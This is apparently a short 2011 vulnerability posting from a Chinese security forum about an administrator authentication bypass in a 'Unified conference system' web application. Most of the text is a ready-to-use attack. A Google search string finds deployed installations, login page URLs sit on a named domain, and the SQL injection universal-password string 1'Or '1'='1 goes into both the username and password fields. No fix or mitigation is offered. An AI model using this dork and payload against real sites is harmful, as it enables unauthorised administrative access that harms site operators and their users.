Unified conference system universal password vulnerability - vulnerability warning - the black bar safety net

2011-05-07T00:00:00
ID MYHACK58:62201130370
Type myhack58
Reporter Anonymous
Modified 2011-05-07T00:00:00

Description

Vulnerability description: the Unified conference system (Unified Council Systems) has a serious administrator authentication bypass vulnerability. If the vulnerability is not fixed, an attacker can use a simple or=or input to get past the back-end login verification, and the consequences are quite serious.

Vulnerability type: SQL injection, universal password, back-end authentication bypass...

Google keywords: intext:"Unified Council. All rights reserved."

Vulnerability test:

[+]http://www.cnc.net/login.aspx

[+]http://www.cnc.net/Path/Login.aspx

[+]http://www.cnc.net/Path/login.aspx

[+]Username : 1'Or '1'='1

[+]Password : 1'Or '1'='1